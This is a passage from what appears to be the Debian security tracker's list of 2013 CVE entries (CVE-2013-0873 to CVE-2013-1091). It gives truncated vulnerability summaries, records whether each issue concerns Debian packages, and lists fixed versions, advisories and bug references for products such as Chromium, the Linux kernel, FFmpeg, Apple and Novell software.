CVE-2013-1091 (Stack-based buffer overflow in Novell iPrint Client before 5.90 allows ...)
	NOT-FOR-US: Novell iPrint Client
CVE-2013-1090 (The SUSE horde5 package before 5.0.2-2.4.1 sets incorrect ownership fo ...)
	- php-horde (SuSE specific packaging flaw)
	NOTE: https://bugzilla.suse.com/show_bug.cgi?id=811369
CVE-2013-1089 RESERVED
CVE-2013-1088 (Cross-site request forgery (CSRF) vulnerability in Novell iManager 2.7 ...)
	NOT-FOR-US: Novell iManager
CVE-2013-1087 (Cross-site scripting (XSS) vulnerability in the client in Novell Group ...)
	NOT-FOR-US: Novell GroupWise
CVE-2013-1086 (Cross-site scripting (XSS) vulnerability in WebAccess in Novell GroupW ...)
	NOT-FOR-US: Novell GroupWise
CVE-2013-1085 (Stack-based buffer overflow in the nim: protocol handler in Novell Gro ...)
	NOT-FOR-US: Novell Messenger
CVE-2013-1084 (Directory traversal vulnerability in the GetFle method in the umaninv ...)
	NOT-FOR-US: Novell ZENworks Configuration Management
CVE-2013-1083 (Unspecified vulnerability in the login functionality in the Reporting ...)
NOT-FOR-US: Novell Identity Manager CVE-2013-1082 (Directory traversal vulnerability in DUSAP.php in Novell ZENworks Mobi ...) NOT-FOR-US: Novell ZENworks CVE-2013-1081 (Directory traversal vulnerability in MDM.php in Novell ZENworks Mobile ...) NOT-FOR-US: Novell ZENworks CVE-2013-1080 (The web server in Novell ZENworks Configuration Management (ZCM) 10.3 ...) NOT-FOR-US: Novell ZENworks CVE-2013-1079 (Directory traversal vulnerability in the ISCreateObject method in an A ...) NOT-FOR-US: Novell ZENworks CVE-2013-1078 RESERVED CVE-2013-1077 REJECTED CVE-2013-1076 REJECTED CVE-2013-1075 REJECTED CVE-2013-1074 REJECTED CVE-2013-1073 REJECTED CVE-2013-1072 REJECTED CVE-2013-1071 REJECTED CVE-2013-1070 (Cross-site scripting (XSS) vulnerability in the API in Ubuntu Metal as ...) NOT-FOR-US: Ubuntu MAAS CVE-2013-1069 (Ubuntu Metal as a Service (MaaS) 1.2 and 1.4 uses world-readable permi ...) NOT-FOR-US: Ubuntu MAAS CVE-2013-1068 (The OpenStack Nova (python-nova) package 1:2013.2.3-0 before 1:2013.2. ...) - nova 2014.1.1-4 (bug #753579) [wheezy] - nova (Vulnerable code not present) - cinder 2014.1.1-3 (bug #753585) [wheezy] - cinder (Vulnerable code not present) NOTE: Requires includedir to be defined in /etc/sudoers file CVE-2013-1067 (Apport 2.12.5 and earlier uses weak permissions for core dump files cr ...) NOT-FOR-US: Apport CVE-2013-1066 (language-selector 0.110.x before 0.110.1, 0.90.x before 0.90.1, and 0. ...) NOT-FOR-US: language-selector CVE-2013-1065 (backend.py in Jockey before 0.9.7-0ubuntu7.11 does not properly use D- ...) NOT-FOR-US: jockey CVE-2013-1064 (apt-xapian-index before 0.45ubuntu2.1, 0.44ubuntu7.1, and 0.44ubuntu5. ...) 
- apt-xapian-index 0.47 (low; bug #724837) [wheezy] - apt-xapian-index (Minor issue, only allows a possibly prohibited update of the Xapian package index) [squeeze] - apt-xapian-index (Minor issue, only allows a possibly prohibited update of the Xapian package index) CVE-2013-1063 (usb-creator 0.2.47 before 0.2.47.1, 0.2.40 before 0.2.40ubuntu2, and 0 ...) NOT-FOR-US: usb-creator CVE-2013-1062 (ubuntu-system-service 0.2.4 before 0.2.4.1. 0.2.3 before 0.2.3.1, and ...) NOT-FOR-US: ubuntu-system-service CVE-2013-1061 (dbus/SoftwarePropertiesDBus.py in Software Properties 0.92.17 before 0 ...) - software-properties 0.92.18 (low) [wheezy] - software-properties (Minor issue) [squeeze] - software-properties (Vulnerable code not present) CVE-2013-1060 (A certain Ubuntu build procedure for perf, as distributed in the Linux ...) NOT-FOR-US: Ubuntu packaging specific CVE-2013-1059 (net/ceph/auth_none.c in the Linux kernel through 3.10 allows remote at ...) {DSA-2745-1} - linux 3.10.1-1 (low) - linux-2.6 (low) [squeeze] - linux-2.6 (CEPH was introduced in 2.6.34) CVE-2013-1058 (maas-import-pxe-files in MAAS before 13.10 does not verify the integri ...) NOT-FOR-US: Ubuntu MAAS CVE-2013-1057 (Untrusted search path vulnerability in maas-import-pxe-files in MAAS b ...) NOT-FOR-US: Ubuntu MAAS CVE-2013-1056 (X.org X server 1.13.3 and earlier, when not run as root, allows local ...) - xorg-server (Ubuntu-specific patch, see http://people.canonical.com/~ubuntu-security/cve/2013/CVE-2013-1056.html) CVE-2013-1055 RESERVED CVE-2013-1054 RESERVED CVE-2013-1053 (In crypt.c of remote-login-service, the cryptographic algorithm used t ...) NOT-FOR-US: remote-login-service Ubuntu package CVE-2013-1052 (pam-xdg-support, as used in Ubuntu 12.10, does not properly handle the ...) NOT-FOR-US: pam-xdg-support (Ubuntu-specific package) CVE-2013-1051 (apt 0.8.16, 0.9.7, and possibly other versions does not properly handl ...) 
- apt 0.9.7.8 [squeeze] - apt (InRelease support not used) CVE-2013-1050 (The default configuration in gnome-screensaver 3.5.4 through 3.6.0 set ...) - gnome-screensaver (Ubuntu-specific Unity patch) CVE-2013-1049 (Buffer overflow in the RFC1413 (ident) client in cfingerd 1.4.3-3 allo ...) {DSA-2635-1} - cfingerd 1.4.3-3.1 (bug #700098) NOTE: https://bugs.launchpad.net/ubuntu/+source/cfingerd/+bug/1104425 CVE-2013-1048 (The Debian apache2ctl script in the apache2 package squeeze before 2.2 ...) {DSA-2637-1} - apache2 2.2.22-13 CVE-2013-1047 (WebKit, as used in Apple iOS before 7, allows remote attackers to exec ...) NOT-FOR-US: Apple iOS CVE-2013-1046 (WebKit, as used in Apple iOS before 7, allows remote attackers to exec ...) NOT-FOR-US: Apple iOS CVE-2013-1045 (WebKit, as used in Apple iOS before 7, allows remote attackers to exec ...) NOT-FOR-US: Apple iOS CVE-2013-1044 (WebKit, as used in Apple iOS before 7, allows remote attackers to exec ...) NOT-FOR-US: Apple iOS CVE-2013-1043 (WebKit, as used in Apple iOS before 7, allows remote attackers to exec ...) NOT-FOR-US: Apple iOS CVE-2013-1042 (WebKit, as used in Apple iOS before 7, allows remote attackers to exec ...) NOT-FOR-US: Apple iOS CVE-2013-1041 (WebKit, as used in Apple iOS before 7, allows remote attackers to exec ...) NOT-FOR-US: Apple iOS CVE-2013-1040 (WebKit, as used in Apple iOS before 7, allows remote attackers to exec ...) NOT-FOR-US: Apple iOS CVE-2013-1039 (WebKit, as used in Apple iOS before 7, allows remote attackers to exec ...) NOT-FOR-US: Apple iOS CVE-2013-1038 (WebKit, as used in Apple iOS before 7, allows remote attackers to exec ...) NOT-FOR-US: Apple iOS CVE-2013-1037 (WebKit, as used in Apple iOS before 7, allows remote attackers to exec ...) NOT-FOR-US: Apple iOS CVE-2013-1036 (Safari in Apple iOS before 7 allows remote attackers to execute arbitr ...) NOT-FOR-US: Apple iOS CVE-2013-1035 (The iTunes ActiveX control in Apple iTunes before 11.1 allows remote a ...) 
NOT-FOR-US: Apple iTunes CVE-2013-1034 (Multiple cross-site scripting (XSS) vulnerabilities in Wiki Server in ...) NOT-FOR-US: Apple Mac OS X Server CVE-2013-1033 (Screen Lock in Apple Mac OS X before 10.8.5 does not properly track se ...) NOT-FOR-US: Screen Lock in Apple Mac OS X CVE-2013-1032 (QuickTime in Apple Mac OS X before 10.8.5 allows remote attackers to e ...) NOT-FOR-US: QuickTime in Apple Mac OS X CVE-2013-1031 (Power Management in Apple Mac OS X before 10.8.5 does not properly per ...) NOT-FOR-US: Power Management in Apple Mac OS X CVE-2013-1030 (mdmclient in Mobile Device Management in Apple Mac OS X before 10.8.5 ...) NOT-FOR-US: Mobile Device Management in Apple Mac OS X CVE-2013-1029 (The kernel in Apple Mac OS X before 10.8.5 allows remote attackers to ...) NOT-FOR-US: Apple Mac OS X CVE-2013-1028 (The IPSec implementation in Apple Mac OS X before 10.8.5, when Hybrid ...) NOT-FOR-US: Apple Mac OS X CVE-2013-1027 (Installer in Apple Mac OS X before 10.8.5 provides an option to contin ...) NOT-FOR-US: Apple Mac OS X CVE-2013-1026 (Buffer overflow in ImageIO in Apple Mac OS X before 10.8.5 allows remo ...) NOT-FOR-US: Apple Mac OS X CVE-2013-1025 (Buffer overflow in CoreGraphics in Apple Mac OS X before 10.8.5 allows ...) NOT-FOR-US: Apple Mac OS X CVE-2013-1024 (CoreMedia Playback in Apple Mac OS X before 10.8.4 does not properly i ...) NOT-FOR-US: CoreMedia Playback CVE-2013-1023 (WebKit, as used in Apple Safari before 6.0.5, allows remote attackers ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-1022 (Buffer overflow in Apple QuickTime before 7.7.4 allows remote attacker ...) NOT-FOR-US: Apple QuickTime CVE-2013-1021 (Buffer overflow in Apple QuickTime before 7.7.4 allows remote attacker ...) NOT-FOR-US: Apple QuickTime CVE-2013-1020 (Apple QuickTime before 7.7.4 allows remote attackers to execute arbitr ...) 
NOT-FOR-US: Apple QuickTime CVE-2013-1019 (Buffer overflow in Apple QuickTime before 7.7.4 allows remote attacker ...) NOT-FOR-US: Apple QuickTime CVE-2013-1018 (Buffer overflow in Apple QuickTime before 7.7.4 allows remote attacker ...) NOT-FOR-US: Apple QuickTime CVE-2013-1017 (Buffer overflow in Apple QuickTime before 7.7.4 allows remote attacker ...) NOT-FOR-US: Apple QuickTime CVE-2013-1016 (Buffer overflow in Apple QuickTime before 7.7.4 allows remote attacker ...) NOT-FOR-US: Apple QuickTime CVE-2013-1015 (Apple QuickTime before 7.7.4 allows remote attackers to execute arbitr ...) NOT-FOR-US: Apple QuickTime CVE-2013-1014 (Apple iTunes before 11.0.3 does not properly verify X.509 certificates ...) NOT-FOR-US: Apple iTunes CVE-2013-1013 (XSS Auditor in WebKit in Apple Safari before 6.0.5 does not properly r ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-1012 (Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari bef ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-1011 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-1010 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-1009 (WebKit, as used in Apple Safari before 6.0.5, allows remote attackers ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-1008 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-1007 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-1006 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-1005 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) 
NOT-FOR-US: Apple iTunes CVE-2013-1004 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-1003 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-1002 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-1001 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-1000 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-0999 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-0998 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-0997 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-0996 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-0995 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-0994 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-0993 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-0992 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-0991 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-0990 (SMB in Apple Mac OS X before 10.8.4, when file sharing is enabled, all ...) NOT-FOR-US: Apple CVE-2013-0989 (Buffer overflow in Apple QuickTime before 7.7.4 allows remote attacker ...) NOT-FOR-US: Apple QuickTime CVE-2013-0988 (Buffer overflow in Apple QuickTime before 7.7.4 allows remote attacker ...) 
NOT-FOR-US: Apple QuickTime CVE-2013-0987 (Apple QuickTime before 7.7.4 allows remote attackers to execute arbitr ...) NOT-FOR-US: Apple QuickTime CVE-2013-0986 (Buffer overflow in Apple QuickTime before 7.7.4 allows remote attacker ...) NOT-FOR-US: Apple QuickTime CVE-2013-0985 (Disk Management in Apple Mac OS X before 10.8.4 does not properly auth ...) NOT-FOR-US: Apple Mac OS X CVE-2013-0984 (Directory Service in Apple Mac OS X through 10.6.8 allows remote attac ...) NOT-FOR-US: Mac OS Server CVE-2013-0983 (Stack consumption vulnerability in CoreAnimation in Apple Mac OS X bef ...) NOT-FOR-US: Apple Mac OS X CVE-2013-0982 (The Private Browsing feature in CFNetwork in Apple Mac OS X before 10. ...) NOT-FOR-US: Apple Mac OS X CVE-2013-0981 (The IOUSBDeviceFamily driver in the USB implementation in the kernel i ...) NOT-FOR-US: Apple iOS CVE-2013-0980 (The Passcode Lock implementation in Apple iOS before 6.1.3 does not pr ...) NOT-FOR-US: Apple iOS CVE-2013-0979 (lockdownd in Lockdown in Apple iOS before 6.1.3 does not properly cons ...) NOT-FOR-US: Apple iOS CVE-2013-0978 (The ARM prefetch abort handler in the kernel in Apple iOS before 6.1.3 ...) NOT-FOR-US: Apple iOS CVE-2013-0977 (dyld in Apple iOS before 6.1.3 and Apple TV before 5.2.1 does not prop ...) NOT-FOR-US: Apple iOS CVE-2013-0976 (IOAcceleratorFamily in Apple Mac OS X before 10.8.3 allows remote atta ...) NOT-FOR-US: Mac OS X CVE-2013-0975 (Buffer overflow in QuickDraw Manager in Apple Mac OS X before 10.8.4 a ...) NOT-FOR-US: Apple Mac OS X CVE-2013-0974 (StoreKit in Apple iOS before 6.1 does not properly handle the disablin ...) NOT-FOR-US: Apple StoreKit CVE-2013-0973 (Software Update in Apple Mac OS X through 10.7.5 does not prevent plug ...) NOT-FOR-US: Mac OS X CVE-2013-0972 RESERVED CVE-2013-0971 (Use-after-free vulnerability in PDFKit in Apple Mac OS X before 10.8.3 ...) NOT-FOR-US: Mac OS X CVE-2013-0970 (Messages in Apple Mac OS X before 10.8.3 allows remote attackers to by ...) 
NOT-FOR-US: Mac OS X CVE-2013-0969 (Login Window in Apple Mac OS X before 10.8.3 does not prevent applicat ...) NOT-FOR-US: Mac OS X CVE-2013-0968 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ex ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0967 (CoreTypes in Apple Mac OS X before 10.8.3 includes JNLP files in the l ...) NOT-FOR-US: Mac OS X CVE-2013-0966 (The Apple mod_hfs_apple module for the Apache HTTP Server in Apple Mac ...) NOT-FOR-US: Apple mod_hfs_apple CVE-2013-0965 RESERVED CVE-2013-0964 (The kernel in Apple iOS before 6.1 and Apple TV before 5.2 does not pr ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0963 (Identity Services in Apple iOS before 6.1 does not properly handle val ...) NOT-FOR-US: Identity Services in Apple iOS CVE-2013-0962 (Cross-site scripting (XSS) vulnerability in WebKit in Apple iOS before ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0961 (WebKit in Apple Safari before 6.0.3 allows remote attackers to execute ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0960 (WebKit in Apple Safari before 6.0.3 allows remote attackers to execute ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0959 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ex ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0958 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ex ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0957 (Data Protection in Apple iOS before 7 allows attackers to bypass inten ...) 
NOT-FOR-US: Apple iOS CVE-2013-0956 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ex ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0955 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ex ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0954 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ex ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0953 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ex ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0952 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ex ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0951 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ex ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0950 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ex ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0949 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ex ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0948 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ex ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0947 (EMC RSA Authentication Manager 8.0 before P1 allows local users to dis ...) NOT-FOR-US: EMC CVE-2013-0946 (Buffer overflow in the Library Control Program (LCP) in EMC AlphaStor ...) 
NOT-FOR-US: EMC CVE-2013-0945 (EMC Avamar Client before 6.1.101-89 does not verify that the server ho ...) NOT-FOR-US: EMC Avamar CVE-2013-0944 (The web-based file-restore interface in EMC Avamar Server before 6.1.0 ...) NOT-FOR-US: EMC Avamar CVE-2013-0943 (EMC NetWorker 7.6.x and 8.x before 8.1 allows local users to obtain se ...) NOT-FOR-US: EMC CVE-2013-0942 (Cross-site scripting (XSS) vulnerability in EMC RSA Authentication Age ...) NOT-FOR-US: EMC RSA Authentication Agent CVE-2013-0941 (EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 ...) NOT-FOR-US: EMC CVE-2013-0940 (The nsrpush process in the client in EMC NetWorker before 7.6.5.3 and ...) NOT-FOR-US: EMC NetWorker CVE-2013-0939 (EMC Documentum Webtop before 6.7 SP2, Documentum WDK before 6.7 SP2, D ...) NOT-FOR-US: EMC CVE-2013-0938 (Cross-site scripting (XSS) vulnerability in EMC Documentum Webtop befo ...) NOT-FOR-US: EMC CVE-2013-0937 (Session fixation vulnerability in EMC Documentum Webtop before 6.7 SP2 ...) NOT-FOR-US: EMC CVE-2013-0936 (Cross-site scripting (XSS) vulnerability in EMC Smarts IP Manager, Sma ...) NOT-FOR-US: EMC CVE-2013-0935 (EMC Smarts Network Configuration Manager (NCM) before 9.2 does not req ...) NOT-FOR-US: EMC CVE-2013-0934 (EMC RSA Archer 5.x before GRC 5.3SP1, and Archer Smart Suite Framework ...) NOT-FOR-US: EMC CVE-2013-0933 (Multiple cross-site scripting (XSS) vulnerabilities in EMC RSA Archer ...) NOT-FOR-US: EMC CVE-2013-0932 (EMC RSA Archer 5.x before GRC 5.3SP1, and Archer Smart Suite Framework ...) NOT-FOR-US: EMC CVE-2013-0931 (EMC RSA Authentication Agent 7.1.x before 7.1.2 on Windows does not en ...) NOT-FOR-US: EMC RSA CVE-2013-0930 (Buffer overflow in Drive Control Program (DCP) in EMC AlphaStor 4.0 be ...) NOT-FOR-US: EMC AlphaStor CVE-2013-0929 (Format string vulnerability in the _vsnsprintf function in rrobotd.exe ...) NOT-FOR-US: EMC AlphaStor CVE-2013-0928 (The NetWorker command processor in rrobotd.exe in the Device Manager i ...) 
NOT-FOR-US: EMC AlphaStor CVE-2013-0927 (Google Chrome OS before 26.0.1410.57 relies on a Pango pango-utils.c r ...) NOT-FOR-US: Chrome OS CVE-2013-0926 (Google Chrome before 26.0.1410.43 does not properly handle active cont ...) - chromium-browser 26.0.1410.43-1 [squeeze] - chromium-browser CVE-2013-0925 (Google Chrome before 26.0.1410.43 does not ensure that an extension ha ...) - chromium-browser 26.0.1410.43-1 [squeeze] - chromium-browser CVE-2013-0924 (The extension functionality in Google Chrome before 26.0.1410.43 does ...) - chromium-browser 26.0.1410.43-1 [squeeze] - chromium-browser CVE-2013-0923 (The USB Apps API in Google Chrome before 26.0.1410.43 allows remote at ...) - chromium-browser 26.0.1410.43-1 [squeeze] - chromium-browser CVE-2013-0922 (Google Chrome before 26.0.1410.43 does not properly restrict brute-for ...) - chromium-browser 26.0.1410.43-1 [squeeze] - chromium-browser CVE-2013-0921 (The Isolated Sites feature in Google Chrome before 26.0.1410.43 does n ...) - chromium-browser 26.0.1410.43-1 [squeeze] - chromium-browser CVE-2013-0920 (Use-after-free vulnerability in the extension bookmarks API in Google ...) - chromium-browser 26.0.1410.43-1 [squeeze] - chromium-browser CVE-2013-0919 (Use-after-free vulnerability in Google Chrome before 26.0.1410.43 on L ...) - chromium-browser 26.0.1410.43-1 [squeeze] - chromium-browser CVE-2013-0918 (Google Chrome before 26.0.1410.43 does not prevent navigation to devel ...) - chromium-browser 26.0.1410.43-1 [squeeze] - chromium-browser CVE-2013-0917 (The URL loader in Google Chrome before 26.0.1410.43 allows remote atta ...) - chromium-browser 26.0.1410.43-1 [squeeze] - chromium-browser CVE-2013-0916 (Use-after-free vulnerability in the Web Audio implementation in Google ...) - chromium-browser 26.0.1410.43-1 [squeeze] - chromium-browser CVE-2013-0915 (The GPU process in Google Chrome OS before 25.0.1364.173 allows attack ...) 
NOT-FOR-US: Overflow in Chrome-specific libs CVE-2013-0914 (The flush_signal_handlers function in kernel/signal.c in the Linux ker ...) {DSA-2668-1} - linux 3.2.41-1 (low) - linux-2.6 (low) CVE-2013-0913 (Integer overflow in drivers/gpu/drm/i915/i915_gem_execbuffer.c in the ...) - linux 3.2.41-2 - linux-2.6 [squeeze] - linux-2.6 (Vulnerable code was introduced later) CVE-2013-0912 (WebKit in Google Chrome before 25.0.1364.160 allows remote attackers t ...) - chromium-browser 25.0.1364.160-1 [squeeze] - chromium-browser CVE-2013-0911 (Directory traversal vulnerability in Google Chrome before 25.0.1364.15 ...) - chromium-browser 25.0.1364.152-1 [squeeze] - chromium-browser CVE-2013-0910 (Google Chrome before 25.0.1364.152 does not properly manage the intera ...) - chromium-browser 25.0.1364.152-1 [squeeze] - chromium-browser CVE-2013-0909 (The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote at ...) - chromium-browser 25.0.1364.152-1 [squeeze] - chromium-browser CVE-2013-0908 (Google Chrome before 25.0.1364.152 does not properly manage bindings o ...) - chromium-browser 25.0.1364.152-1 [squeeze] - chromium-browser CVE-2013-0907 (Race condition in Google Chrome before 25.0.1364.152 allows remote att ...) - chromium-browser 25.0.1364.152-1 [squeeze] - chromium-browser CVE-2013-0906 (The IndexedDB implementation in Google Chrome before 25.0.1364.152 all ...) - chromium-browser 25.0.1364.152-1 [squeeze] - chromium-browser CVE-2013-0905 (Use-after-free vulnerability in Google Chrome before 25.0.1364.152 all ...) - chromium-browser 25.0.1364.152-1 [squeeze] - chromium-browser CVE-2013-0904 (The Web Audio implementation in Google Chrome before 25.0.1364.152 all ...) - chromium-browser 25.0.1364.152-1 [squeeze] - chromium-browser CVE-2013-0903 (Use-after-free vulnerability in Google Chrome before 25.0.1364.152 all ...) 
- chromium-browser 25.0.1364.152-1 [squeeze] - chromium-browser CVE-2013-0902 (Use-after-free vulnerability in the frame-loader implementation in Goo ...) - chromium-browser 25.0.1364.152-1 [squeeze] - chromium-browser CVE-2013-0901 RESERVED CVE-2013-0900 (Race condition in the International Components for Unicode (ICU) funct ...) {DSA-2786-1} - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser - icu 4.8.1.1-12 (low; bug #702346) [squeeze] - icu (Minor issue for standalone ICU outside of browser context) CVE-2013-0899 (Integer overflow in the padding implementation in the opus_packet_pars ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser - opus 0.9.14+20120615-1+nmu1 (bug #704870) CVE-2013-0898 (Use-after-free vulnerability in Google Chrome before 25.0.1364.97 on W ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0897 (Off-by-one error in the PDF functionality in Google Chrome before 25.0 ...) - chromium-browser (PDF viewer not included in Chromium) [squeeze] - chromium-browser CVE-2013-0896 (Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25. ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0895 (Google Chrome before 25.0.1364.97 on Linux, and before 25.0.1364.99 on ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0894 (Buffer overflow in the vorbis_parse_setup_hdr_floors function in the V ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) - libav 6:0.8.6-1 (bug #703200) CVE-2013-0893 (Race condition in Google Chrome before 25.0.1364.97 on Windows and Lin ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0892 (Multiple unspecified vulnerabilities in the IPC layer in Google Chrome ...) 
- chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0891 (Integer overflow in Google Chrome before 25.0.1364.97 on Windows and L ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0890 (Multiple unspecified vulnerabilities in the IPC layer in Google Chrome ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0889 (Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25. ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0888 (Skia, as used in Google Chrome before 25.0.1364.97 on Windows and Linu ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0887 (The developer-tools process in Google Chrome before 25.0.1364.97 on Wi ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0886 (Google Chrome before 25.0.1364.99 on Mac OS X does not properly implem ...) - chromium-browser (Mac OS X only) [squeeze] - chromium-browser CVE-2013-0885 (Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25. ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0884 (Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25. ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0883 (Skia, as used in Google Chrome before 25.0.1364.97 on Windows and Linu ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0882 (Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25. ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0881 (Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25. ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0880 (Use-after-free vulnerability in Google Chrome before 25.0.1364.97 on W ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0879 (Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25. 
...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser CVE-2013-0878 (The advance_line function in libavcodec/targa.c in FFmpeg before 1.1.3 ...) - ffmpeg (Affected code not present in 0.5 ffmpeg) - libav (Affected code not present in libav) CVE-2013-0877 (The old_codec37 function in libavcodec/sanm.c in FFmpeg before 1.1.3 a ...) - ffmpeg (Smush codec not present in 0.5 ffmpeg) - libav (Smush codec not present in libav) CVE-2013-0876 (Multiple integer overflows in the (1) old_codec37 and (2) old_codec47 ...) - ffmpeg (Smush codec not present in 0.5 ffmpeg) - libav (Smush codec not present in libav) CVE-2013-0875 (The ff_add_png_paeth_prediction function in libavcodec/pngdec.c in FFm ...) - ffmpeg (Affected code not present in 0.5 ffmpeg) - libav (Affected code not present in libav) CVE-2013-0874 (The (1) doubles2str and (2) shorts2str functions in libavcodec/tiff.c ...) - ffmpeg (Affected code not present in 0.5 ffmpeg) - libav (Affected code not present in libav) CVE-2013-0873 (The read_header function in libavcodec/shorten.c in FFmpeg before 1.1. ...) - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) - libav 6:0.8.6-1 (bug #717009) NOTE: Commit in libav trunk http://git.libav.org/?p=libav.git;a=commit;h=c10da30d8426a1f681d99a780b6e311f7fb4e5c5 NOTE: 